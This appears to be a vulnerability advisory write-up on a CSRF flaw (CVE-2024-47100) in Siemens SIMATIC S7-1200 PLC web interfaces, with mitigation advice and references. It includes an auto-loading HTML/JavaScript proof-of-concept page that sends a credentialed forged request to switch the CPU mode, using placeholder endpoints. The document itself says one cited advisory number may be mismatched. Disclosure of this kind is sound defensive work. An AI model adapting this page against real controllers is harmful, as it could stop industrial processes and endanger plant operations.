A security vulnerability (CVE-2024-47100) has been disclosed in the web interface of the SIMATIC S7-1200 CPU family manufactured by Siemens. The web server does not protect state-changing requests against Cross-Site Request Forgery (CSRF), so an attacker who lures a user with an authenticated web-interface session into opening a malicious page can have that user's browser issue requests on the attacker's behalf. A wide range of S7-1200 CPU models is affected; the full model list is given in the Siemens advisory referenced below.
Exploit Details
The web interface of the SIMATIC S7-1200 CPUs accepts state-changing requests without verifying that they originate from its own pages. An unauthenticated attacker can exploit this by convincing a legitimate user who is logged in to the web interface with sufficient permissions to click a malicious link or open an attacker-controlled page. The victim's browser automatically attaches the session credentials to the forged request, so the attacker can change the CPU operating mode (for example, switch the controller to STOP) without the user's knowledge or consent. On a running plant this means an operational disruption, and a CPU left in an attacker-chosen state can serve as a foothold for further malicious activity.
Code Snippet
The following HTML/JavaScript page demonstrates how an attacker could host a malicious link that, when opened by a user with an authenticated session to the affected device, makes the browser send a CSRF request to change the CPU mode. The endpoint path and form fields are placeholders; the real S7-1200 request is not reproduced here.
<!DOCTYPE html>
<html>
<body>
<script>
// Attacker-hosted page. The victim must already hold an authenticated
// session with the CPU web interface in the same browser; the attacker
// never learns the password, the session cookie carries the authentication.
function csrf_attack() {
  var xhr = new XMLHttpRequest();
  // Placeholder path, not the real device endpoint.
  xhr.open("POST", "http://target_IP_address/settings/changecpu");
  // Send the victim's cookies with the cross-origin request; without this
  // the request would arrive at the CPU unauthenticated.
  xhr.withCredentials = true;
  // A form-urlencoded POST is a "simple" request, so no CORS preflight is
  // triggered. The attacker cannot read the response, but does not need to.
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send("mode=desired_cpu_mode");
}
window.onload = csrf_attack;
</script>
</body>
</html>
Mitigation
To protect against CSRF attacks, operators are strongly recommended to apply the countermeasures Siemens lists in the advisory referenced below. Independently of the firmware fix, the generic CSRF hygiene applies: do not browse untrusted links from a browser that holds an authenticated session to the CPU web interface, log out of the web interface when finished, and expose the web server only inside a protected automation network.
Original References
Siemens has acknowledged the vulnerability and published an advisory detailing the affected products and countermeasures. Refer to the following for more information:
- Siemens Security Advisory SSA-345015: CSRF vulnerability in the web interface of SIMATIC S7-1200 CPUs
Further reading:
- National Vulnerability Database: CVE-2024-47100
- CISA ICS Advisory for CVE-2024-47100 (Siemens SIMATIC S7-1200 CPU); the advisory number cited on the original page, ICSA-21-168-04, predates this CVE and should be checked against the CISA advisory index before use
Stay vigilant and keep CPU firmware up to date to safeguard against this and similar threats.
Timeline
Published on: 01/14/2025 11:15:16 UTC